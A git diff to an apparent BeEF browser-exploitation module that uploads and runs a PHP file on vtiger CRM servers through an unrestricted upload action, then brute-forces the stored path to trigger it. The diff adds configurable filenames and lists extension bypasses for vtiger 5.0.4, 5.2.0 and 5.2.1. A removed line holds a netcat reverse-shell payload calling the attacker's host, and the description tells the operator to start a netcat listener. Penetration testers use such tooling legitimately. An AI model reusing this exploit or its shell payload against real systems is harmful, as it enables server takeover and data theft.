diff --git a/modules/network/vtiger_crm_upload_exploit/command.js b/modules/network/vtiger_crm_upload_exploit/command.js
index 236865722..3cad71a87 100644
--- a/modules/network/vtiger_crm_upload_exploit/command.js
+++ b/modules/network/vtiger_crm_upload_exploit/command.js
@@ -26,6 +26,22 @@ beef.execute(function() {
baseurl = "<%= @vtiger_url %>";
+ function get_ajax() {
+ var http_request;
+ // use the ActiveX control for IE5.x and IE6
+ try {
+ http_request = new ActiveXObject("MSXML2.XMLHTTP");
+ } catch (othermicrosoft){
+ try {
+ http_request = new ActiveXObject("Microsoft.XMLHTTP");
+ } catch (native) {
+ // If IE7, Mozilla, Safari, etc: Use native object
+ http_request = new XMLHttpRequest();
+ }
+ }
+ return http_request;
+ }
+
function do_upload(){
setTimeout(function() {ajax_upload()}, 1000);
}
@@ -40,8 +56,11 @@ beef.execute(function() {
function ajax_upload(){
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
- http_request = false;
- http_request = beef.net.get_ajax();
+ var http_request;
+
+ http_request = false;
+ http_request = get_ajax();
+
if (!http_request) {
// fail silently!
return false;
@@ -77,18 +96,16 @@ beef.execute(function() {
+ '\r\n'
+ boundary
+ '\r\n'
- + 'Content-Disposition: form-data; name="filename"; filename="vtiger-fun.PHP"' + '\r\n'
+ + 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n'
+ 'Content-Type: application/x-httpd-php' + '\r\n'
+ '\r\n'
- + '<\?php' + '\r\n'
+ '<%= @vtiger_php %>' + '\r\n'
- + '\?>' + '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n'
+ '\r\n'
- + 'vtiger-fun.PHP'
+ + '<%= @mal_filename %>.<%= @mal_ext %>'
+ '\r\n'
+ boundary
+ '\r\n'
@@ -137,14 +154,14 @@ beef.execute(function() {
} else if (uploadstate == 3) {
//We got a 200, so hopefully the file was uploaded
//be_graceful();
- do_callfile(0,1000);
+ do_callfile(0, 1000);
}
},<%= @upload_timeout %>);
return;
}
- function do_callfile(start,count){
+ function do_callfile(start, count){
if (document.getElementById('vtigerimg') == null) {
return false;
}
@@ -152,13 +169,13 @@ beef.execute(function() {
for (i=start;i<=start+count;i++)
{
var http_request = false;
- http_request = beef.net.get_ajax();
+ http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
- var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_vtiger-fun.PHP";
+ var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";
var requestbody = "birds of a feather flock together";
http_request.open('POST', findurl, false);
diff --git a/modules/network/vtiger_crm_upload_exploit/config.yaml b/modules/network/vtiger_crm_upload_exploit/config.yaml
index 5d1d01a51..4dbe58bc9 100644
--- a/modules/network/vtiger_crm_upload_exploit/config.yaml
+++ b/modules/network/vtiger_crm_upload_exploit/config.yaml
@@ -5,6 +5,6 @@ beef:
category: "Network"
name: "VTiger CRM Upload Exploit"
description: "This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don't forget to start one, for example: nc -l 8888."
- authors: ["wade", "bm", "pipes", "xntrik"]
+ authors: ["wade", "bm", "pipes", "xntrik", "yorikv"]
target:
working: ["ALL"]
diff --git a/modules/network/vtiger_crm_upload_exploit/module.rb b/modules/network/vtiger_crm_upload_exploit/module.rb
index 5dc7aa7e0..b61ca5902 100644
--- a/modules/network/vtiger_crm_upload_exploit/module.rb
+++ b/modules/network/vtiger_crm_upload_exploit/module.rb
@@ -15,14 +15,16 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command
super({
'Name' => 'VTiger CRM Upload Exploit',
- 'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888',
+ 'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888.
vTigerCRM 5.0.4: Use extension "PHP" and php code.
vTigerCRM 5.2.0: Use extension "phtml" and php code.
vTigerCRM 5.2.1: Use extensions "shtml" and SSI code.',
'Category' => 'Network',
- 'Author' => ['wade', 'bm', 'pipes', 'xntrik'],
+ 'Author' => ['wade', 'bm', 'pipes', 'xntrik', 'yorikv'],
'Data' =>
[
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
- {'name'=>'vtiger_php','ui_label'=>'Injected PHP','value'=>'passthru("/bin/nc -e /bin/sh '+beef_host+' 8888");','type'=>'textarea','width'=>'400px','height'=>'100px'},
+ {'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
+ {'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
+ {'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'','type'=>'textarea','width'=>'400px','height'=>'100px'},
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
],
'File' => __FILE__